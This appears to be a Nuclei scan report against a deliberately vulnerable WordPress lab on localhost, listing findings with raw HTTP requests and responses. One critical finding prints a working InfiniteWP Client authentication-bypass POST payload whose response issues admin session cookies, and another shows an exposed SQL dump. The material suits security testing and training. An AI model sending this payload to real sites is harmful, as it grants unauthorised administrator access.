<a href="http://www.php.net/"><img border="0" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAHkAAABACAYAAAA+j9gsAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAD4BJREFUeNrsnXtwXFUdx8/dBGihmE21QCrQDY6oZZykon/gY5qizjgM2KQMfzFAOioOA5KEh+j4R9oZH7zT6MAMKrNphZFSQreKHRgZmspLHSCJ2Co6tBtJk7Zps7tJs5t95F5/33PvWU4293F29ybdlPzaM3df2XPv+Zzf4/zOuWc1tkjl+T0HQ3SQC6SBSlD6WKN4rusGm9F1ps/o5mPriOf8dd0YoNfi0nt4ntB1PT4zYwzQkf3kR9/sW4xtpS0CmE0SyPUFUJXFMIxZcM0jAZ4xrKMudQT7963HBF0n6EaUjkP0vI9K9OEHWqJLkNW1s8mC2WgVTwGAqWTafJzTWTKZmQuZ/k1MpAi2+eys6mpWfVaAPzcILu8EVKoCAaYFtPxrAXo8qyNwzZc7gSgzgN9Hx0Ecn3j8xr4lyHOhNrlpaJIgptM5DjCdzrJ0Jmce6bWFkOpqs0MErA4gXIBuAmY53gFmOPCcdaTXCbq+n16PPLXjewMfGcgEttECeouTpk5MplhyKsPBTiXNYyULtwIW7Cx1vlwuJyDLR9L0mQiVPb27fhA54yBbGttMpc1OWwF1cmKaH2FSF7vAjGezOZZJZ9j0dIZlMhnuRiToMO0c+N4X7oksasgEt9XS2KZCHzoem2Ixq5zpAuDTqTR14FMslZyepeEI4Ogj26n0vLj33uiigExgMWRpt+CGCsEePZqoePM738BPTaJzT7CpU0nu1yXpAXCC3VeRkCW4bfJYFZo6dmJyQTW2tvZc1nb719iyZWc5fmZ6Osu6H3uVzit52oBnMll2YizGxk8muFZLAshb/YKtzQdcaO3Y2CQ7eiy+YNGvLN+4+nJetm3bxhKJxJz316xZw1pbW9kLew+w1944XBEaPj6eYCeOx1gqNe07bK1MwIDbKcOFOR49GuePT5fcfOMX2drPXcQ0zf7y2tvbWVdXF/v1k2+yQ4dPVpQ5P0Um/NjoCX6UBMFZR6k+u7qMYVBYDIEqBW7eXAfPZX19zp2/oaGBHysNMGTFinPZik9fWggbI5Omb13zUDeB3lLsdwaK/YPeyAFU0i8Aw9/2Dwyx4SPjFQEYUlf3MTYw4Jx7CIVCbHR0oqIDNMD+FMG+ZE0dO/tsHlvAWnYS6H4qjfMC+Zld/wg92/tuv2WeeYT87j+H2aFDxysGLuSy+o/z49DQkONnmpqa2MjRyoYsZOXKGnb5Z+vZqlUrxUsAvI9At/oK+elnBpoNw+Dai9TekSMxDrgSh0KrSYshTprc2NhoRf1JtlikqirAVl98AddsSavDBDrsC+QdT7/TSoB344tzOZ39+70RbporVerqasyw1MEnC8iV6I9VTDi0uqbmfPFSq2W+gyUHXuEdb3WR5rab5jnD3i/BNMN8ChNaqsTiKa55KmBWX+Tuj0XQdQVF307nhTH0CPls+O0UPbaT5TQG/8qX68u6LpV67LQ6dNknaYgaYyPDx2TzvYGCsnhRkH8b/rsF2GDj1MCInkvxvRjOuCUlipWD/zrKx7ZOwBF0vfSSM2ShyaqAAOC1Nw+zt9/5YNbrN1zfwIdpfgnqebv/A6pnWAn4qlW1HPgHQ6OeoG3N9RO/+StMdDtmV2LxJPfBpQCGfwTgrVu38jFrKaW2tpZt2LCBdXR0sEgkwhv21u9cxQsyW3ZB1+DgoOM54btU6tu8eTPr6elhy5fr7IZNDey+e76e9/fCLcAllHpdKKinpaUlX8+111xB9VzNrYxqUAY/XVVVJYMOekLu2fFGM8VWYQRYiYkU9bD4vPlHFYnH4/zvkb1CgwACHgMoUpdyw3sFXcXUh4YHaNSHDqaxdL5jwVTXBpeXVY9oF3RcUQ+O09NT7Cayfld+4RJlP42gTIq8w66Qf/X4a6FTSSMMDcaE/NhYecMM+MdyG90OAhodWoAGkTUaSZByO5WdiA4GqwStrrM6k5vFKEXQserr63l7oR5V0NBojKctaSZtbneErOtGmFxwkGewjk0UzpCUlJSIRqMcjN8CkHLDqyRByq0PEGBBhDmdj7rQVujAaLfrrlk7xyW5gUaxpEtOmOQDr0e799NYmDVBi0+OT7FcbsaXxEQk8qprEBQMBm0vVKUBRcNjskFE8W71lSt79uzhda1d6w4ZGTUUp3NWAQ3TvW/fPvbVq+rZH/ceULOcF1/I06CY3QJohCCzNJnYdgEwwvpUKuNbUsLNpO3evZtfSGHp7+/nS2pw3LLFPVWLoA5yHQUtXvXFYjH+vU4F5yOibzsRUL38MTqC3XWh8GCWziMcDjt2BNEZUIfoUOpJkwvziT3S5ua8Jj/4yD5E0yERbPkhKv4RF4mhkN1wCMHN2rWfYZ2dnWz9+vXchNkJzBoaQ8Bxqg91wWo41YdO2dzczD+3bt06Rw0rBG4nOF8oi9M0Jsw9OgLqQ124BifLgeuHyVbN0NXUrODBmDWxgRR0pNrUYqMNgDOZGZbNzvgCuc4j0kX+GPJ2//CcMagQmKkbrm/knwVEp++SIXulM1+nhj9AY207QRDnpsnye24WA59DkuPlV/5j+z5eB2hE0W1tbTyQdNJmDpksRzFp2E9csFJAboRvDvz8gZdJgw2ek55KZphfAv+Inu8UdKnmkEUHQK93EjEZ4Rbkifq8JiactEpYAy9Nli2Gm6CjIZPn1qlKFWizleOG3BIwdKNZ+KRMxr9VHKvr1NKLXo2BhlAVFRPq1qlWW6MBr3NWyY2rTGXO5ySJlN9uDuiGsV7XTVPtl8CHYGizf/9+V5Om0hAwVV4ahuU8qia03HP26kyqFkMOTudDzjs/P/QKBUiBYa5ZNucfZJUkCG/0IhpCxYyqBF3lnLOII8q1GKqdStQ3rTh5MStwXX5O/nE1metGQzPHUH6JatA1OppQ8u1eUbpX44tO4GY5vM5Z9sduFgOfG1GwUOK6VFzaSAmrWCSfzGCuuT/O+bi6QwRdTtqXN2keJ4/ejgkJ5HedRARkbkGe6ARulgMWQ+Wc3cDAWohhoZdcue7ifJ7crfP6Me8dELd0Mv8U2begC2k9SHd3t+NnNm7cqKwRbiYUkykqvlZlmOYVLIq5bHRep46JzotOc9BhuFc0ZHGLph+CJIaXr1FZSIfxsdBiN1+LpALEK2By61Aqs0rwtV7DNBU3BMCYixYTLU6C8bM5hBwum0k1mesBpmPtlj+qXFenFsAgCVLon9DYeIxUnmh05HCdBIkCVRP6ussiepVZJZXIutCHwt2I0YGY2Kiz3AIyeG5aLNooVULQBbHy1/nAK2oEtEanheil+GO3aFg0FnwSilNC4q6OrXzywc0XCy1WMaFu/tgrCBLRuWpHuP+n1zqmRXFN0GAnwKgHeW1E1C/86UDJHFKptATZMPZTafbLXHtN3OPixKRC4ev4GwB2Gy6JxhQNEYul+KoKp79RMaGqKzy9ovzt27c7pidVZtYAGJMYOP7u6bdK1mLI1GQ+/ogSZBahwKuLO2jSZt0odw65xrUhAMNrZskLsGiIXz72F3bTjV+ixvtbWcMQr3NW.... Truncated ....
Extra Information
Extracted results:
- 7.1.33
Generated by Nuclei
[wordpress-infinitewp-auth-bypass] [critical] WordPress InfiniteWP Client Authentication Bypass found on http://127.0.0.1:31337
Details: wordpress-infinitewp-auth-bypass matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/
Timestamp: Tue Jul 6 13:46:47 +0000 UTC 2021
Template Information
Key | Value |
---|---|
tags | wordpress,auth-bypass,wp-plugin |
name | WordPress InfiniteWP Client Authentication Bypass |
author | princechaddha |
severity | critical |
Request
POST / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
Content-Length: 93
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
ContentLength: 3537
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/plain;charset=UTF-8
Date: Tue, 06 Jul 2021 13:46:47 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=5FL4YXAfW9fxAZgXqRYRfGADNqQt4Ckd; expires=Thu, 08-Jul-2021 13:46:47 GMT; Max-Age=172800; path=/
Set-Cookie: wordpress_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625752007%7Cp6WrK6rtP4z6CQtuOIml6zHeqLt1PMYVfWfZ6F4dD9o%7Ce08fcf9c3a43ccf242a91fc286ad7491bac76999655ac34019e89159d697edd1; path=/wp-content/plugins; HttpOnly
Set-Cookie: wordpress_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625752007%7Cp6WrK6rtP4z6CQtuOIml6zHeqLt1PMYVfWfZ6F4dD9o%7Ce08fcf9c3a43ccf242a91fc286ad7491bac76999655ac34019e89159d697edd1; path=/wp-admin; HttpOnly
Set-Cookie: wordpress_logged_in_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625752007%7Cp6WrK6rtP4z6CQtuOIml6zHeqLt1PMYVfWfZ6F4dD9o%7Cb7e65bcb519f690b989c99e42682ff74add98ecdc186e693588612ffd75ba5b7; path=/; HttpOnly
Set-Cookie: wordpress_sec_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625752007%7CoXcoItFWJcPKrrNwe4cWoaQASNB4b7T1pYrU3DucpHr%7C325f695f4b52e4c84037338dae8ab9659ebae16ab7eeb6899fb1a19bd616b2f6; path=/wp-content/plugins; secure; HttpOnly
Set-Cookie: wordpress_sec_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625752007%7CoXcoItFWJcPKrrNwe4cWoaQASNB4b7T1pYrU3DucpHr%7C325f695f4b52e4c84037338dae8ab9659ebae16ab7eeb6899fb1a19bd616b2f6; path=/wp-admin; secure; HttpOnly
Set-Cookie: wordpress_logged_in_5b2dbabcbcf581dd4a9fba6cd728b7f5=admin%7C1625752007%7CoXcoItFWJcPKrrNwe4cWoaQASNB4b7T1pYrU3DucpHr%7Cc710619367ff0d28ed57e20bc2f37601291623cd797451fbba1aae451d1ed765; path=/; HttpOnly
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<IWPHEADER>_IWP_JSON_PREFIX_eyJlcnJvciI6IkludmFsaWQgYWN0aXZhdGlvbiBrZXkiLCJlcnJvcl9jb2RlIjoiaXdwX21tYl9hZGRfc2l0ZV9pbnZhbGlkX2FjdGl2YXRpb25fa2V5In0=<ENDIWPHEADER>
Reference:
Generated by Nuclei
[default-sql-dump] [medium] MySQL Dump Files found on http://127.0.0.1:31337
Details: default-sql-dump matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/dump.sql
Timestamp: Wed Jul 7 00:11:38 +0000 UTC 2021
Template Information
Key | Value |
---|---|
tags | exposure,backup |
name | MySQL Dump Files |
author | geeknik,dwisiswant0 |
severity | medium |
Request
GET /dump.sql HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Range: bytes=0-3000
Response
HTTP/1.1 206 Partial Content
Connection: close
Content-Length: 1191
Accept-Ranges: bytes
Content-Range: bytes 0-1190/1191
Content-Type: application/x-sql
Date: Wed, 07 Jul 2021 00:11:38 GMT
Etag: "4a7-5c67d5bfbe600"
Last-Modified: Wed, 07 Jul 2021 00:10:00 GMT
Server: Apache/2.4.38 (Debian)
-- MySQL dump 10.13 Distrib 5.7.26, for Linux (x86_64)
--
-- Host: localhost Database: wordpress
-- ------------------------------------------------------
-- Server version 5.7.26-0ubuntu0.18.04.1
LOCK TABLES `wp_posts` WRITE;
UPDATE `wp_posts` SET `post_content` = '<!-- wp:paragraph -->\r\n<p>Welcome to Damn Vulnerable WordPress. This is your first post. Edit or delete it, then start writing!</p>\r\n<!-- /wp:paragraph -->', `post_title` = 'Hack Me If You Can', `post_name` = 'hack-me-if-you-can' WHERE `wp_posts`.`ID` = 1;
UNLOCK TABLES;
LOCK TABLES `wp_users` WRITE;
INSERT INTO `wordpress`.`wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_registered`) VALUES ('2', 'editor', MD5('editor'), 'Editor', '[email protected]', '2020-01-01 00:00:00');
UNLOCK TABLES;
LOCK TABLES `wp_usermeta` WRITE;
INSERT INTO `wordpress`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '2', 'wp_capabilities', 'a:1:{s:6:"editor";b:1;}');
UNLOCK TABLES;
LOCK TABLES `wp_usermeta` WRITE;
INSERT INTO `wordpress`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '2', 'wp_user_level', '7');
UNLOCK TABLES;
Generated by Nuclei
[wordpress-panel] [info] WordPress Panel found on http://127.0.0.1:31337
Details: wordpress-panel matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/wp-login.php
Timestamp: Wed Jul 7 00:11:29 +0000 UTC 2021
Template Information
Key | Value |
---|---|
severity | info |
tags | panel |
name | WordPress Panel |
author | github.com/its0x08 |
Request
GET /wp-login.php HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Jul 2021 00:11:29 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<!--<![endif]-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Log In ‹ Damn Vulnerable WordPress — WordPress</title>
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='dashicons-css' href='http://127.0.0.1:31337/wp-includes/css/dashicons.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='buttons-css' href='http://127.0.0.1:31337/wp-includes/css/buttons.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='forms-css' href='http://127.0.0.1:31337/wp-admin/css/forms.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='l10n-css' href='http://127.0.0.1:31337/wp-admin/css/l10n.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='login-css' href='http://127.0.0.1:31337/wp-admin/css/login.min.css?ver=5.3' media='all' />
<meta name='robots' content='noindex,noarchive' />
<meta name='referrer' content='strict-origin-when-cross-origin' />
<meta name="viewport" content="width=device-width" />
</head>
<body class="login no-js login-action-login wp-core-ui locale-en-us">
<script type="text/javascript">
document.body.className = document.body.className.replace('no-js','js');
</script>
<div id="login">
<h1><a href="https://wordpress.org/">Powered by WordPress</a></h1>
<form name="loginform" id="loginform" action="http://127.0.0.1:31337/wp-login.php" method="post">
<p>
<label for="user_login">Username or Email Address</label>
<input type="text" name="log" id="user_login" class="input" value="" size="20" autocapitalize="off" />
</p>
<div class="user-pass-wrap">
<label for="user_pass">Password</label>
<div class="wp-pwd">
<input type="password" name="pwd" id="user_pass" class="input password-input" value="" size="20" />
<button type="button" class="button button-secondary wp-hide-pw hide-if-no-js" data-toggle="0" aria-label="Show password">
<span class="dashicons dashicons-visibility" aria-hidden="true"></span>
</button>
</div>
</div>
<p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /> <label for="rememberme">Remember Me</label></p>
<p class="submit">
<input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" />
<input type="hidden" name="redirect_to" value="http://127.0.0.1:31337/wp-admin/" />
<input type="hidden" name="testcookie" value="1" />
</p>
</form>
<p id="nav">
<a href="http://127.0.0.1:31337/wp-login.php?action=lostpassword">Lost your password?</a>
</p>
<script type="text/javascript">
function wp_attempt_focus() {setTimeout( function() {try {d = document.getElementById( "user_login" );d.focus(); d.select();} catch( er ) {}}, 200);}
wp_attempt_focus();
if ( typeof wpOnload === 'function' ) { wpOnload() } </script>
<p id="backtoblog"><a href="http://127.0.0.1:31337/">
← Back to Damn Vulnerable WordPress </a></p>
</div>
<script src='http://127.0.0.1:31337/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script src='http://127.0.0.1:31337/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script>
var _zxcvbnSettings = {"src":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/zxcvbn.min.js"};
</script>
<script src='http://127.0.0.1:31337/wp-includes/js/zxcvbn-async.min.js?ver=1.0'></script>
<script>
var pwsL10n = {"unknown":"Password strength unknown","short":"Very weak","bad":"Weak","good":"Medium","strong":"Strong","mismatch":"Mismatch"};
</script>
<script src='http://127.0.0.1:31337/wp-admin/js/password-strength-meter.min.js?ver=5.3'></script>
<script src='http://127.0.0.1:31337/wp-includes/js/underscore.min.js?ver=1.8.3'></script>
<script>
var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};
</script>
<script src='http://127.0.0.1:31337/wp-includes/js/wp-util.min.js?ver=5.3'></script>
<script>
var userProfileL10n = {"warn":"Your new password has not been saved.","warnWeak":"Confirm use of weak password","show":"Show","hide":"Hide","cancel":"Cancel","ariaShow":"Show password","ariaHide":"Hide password"};
</script>
<script src='http://127.0.0.1:31337/wp-admin/js/user-profile.min.js?ver=5.3'></script>
<script>
/(trident|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.... Truncated ....
Generated by Nuclei
[tech-detect:php] [info] Wappalyzer Technology Detection found on http://127.0.0.1:31337
Details: tech-detect:php matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337
Timestamp: Thu Jul 8 00:10:52 +0000 UTC 2021
Template Information
Key | Value |
---|---|
tags | tech |
name | Wappalyzer Technology Detection |
author | hakluke |
severity | info |
Request
GET / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Jul 2021 00:10:52 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=rg5qcGMHc4cQSA69smOqz9DfxaQBrEsB; expires=Sat, 10-Jul-2021 00:10:52 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Damn Vulnerable WordPress – Just another WordPress site</title>
<!-- Social Warfare v3.5.2 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2");src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2#iefix") format("embedded-opentype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.2") format("woff"),
url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.2") format("truetype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.2#1445203416") format("svg");font-weight: normal;font-style: normal;}</style>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Feed" href="http://127.0.0.1:31337/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Comments Feed" href="http://127.0.0.1:31337/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3"}};
!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style>
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<link rel='stylesheet' id='social-warfare-block-css-css' href='http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=5.3' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://127.0.0.1:31337/wp-includes/css/dist/block-library/style.min.css?ver=5.3' media='all' />
<link rel='stylesheet' id='js-autocomplete-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/jquery.autocomplete.css?ver=1.0' media='all' />
<link rel='stylesheet' id='wordpress-file-upload-style-css' href='http://127.0.0.1:31337/wp-content/plugins/wp-file-upload/css/wordpre.... Truncated ....
Generated by Nuclei
[wordpress-xmlrpc-file] [info] WordPress xmlrpc found on http://127.0.0.1:31337
Details: wordpress-xmlrpc-file matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337/xmlrpc.php
Timestamp: Wed Jul 7 00:11:32 +0000 UTC 2021
Template Information
Key | Value |
---|---|
name | WordPress xmlrpc |
author | udit_thakkur |
severity | info |
tags | wordpress |
Request
GET /xmlrpc.php HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 405 Method Not Allowed
Connection: close
Content-Length: 42
Allow: POST
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Jul 2021 00:11:32 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=nKb4L7HYyX6sqMLWDMNddW64yNdLscFg; expires=Fri, 09-Jul-2021 00:11:32 GMT; Max-Age=172800; path=/
X-Powered-By: PHP/7.1.33
XML-RPC server accepts POST requests only.
Generated by Nuclei
[tech-detect:php] [info] Wappalyzer Technology Detection found on http://127.0.0.1:31337
Details: tech-detect:php matched at http://127.0.0.1:31337
Protocol: HTTP
Full URL: http://127.0.0.1:31337
Timestamp: Tue Jul 6 13:46:34 +0000 UTC 2021
Template Information
Key | Value |
---|---|
severity | info |
tags | tech |
name | Wappalyzer Technology Detection |
author | hakluke |
Request
GET / HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Jul 2021 13:46:34 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=XsfEF5n3CjQsx2bSaB2eEsGpq9e3yxqK; expires=Thu, 08-Jul-2021 13:46:34 GMT; Max-Age=172800; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.1.33
<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0" >
<link rel="profile" href="https://gmpg.org/xfn/11">
<title>Damn Vulnerable WordPress – Just another WordPress site</title>
<!-- Social Warfare v3.5.2 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2");src:url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.5.2#iefix") format("embedded-opentype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.5.2") format("woff"),
url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.5.2") format("truetype"),url("http://127.0.0.1:31337/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.5.2#1445203416") format("svg");font-weight: normal;font-style: normal;}</style>
<!-- Social Warfare v3.5.2 https://warfareplugins.com -->
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Feed" href="http://127.0.0.1:31337/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Damn Vulnerable WordPress » Comments Feed" href="http://127.0.0.1:31337/?feed=comments-rss2" />
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/127.0.0.1:31337\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3"}};
!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var 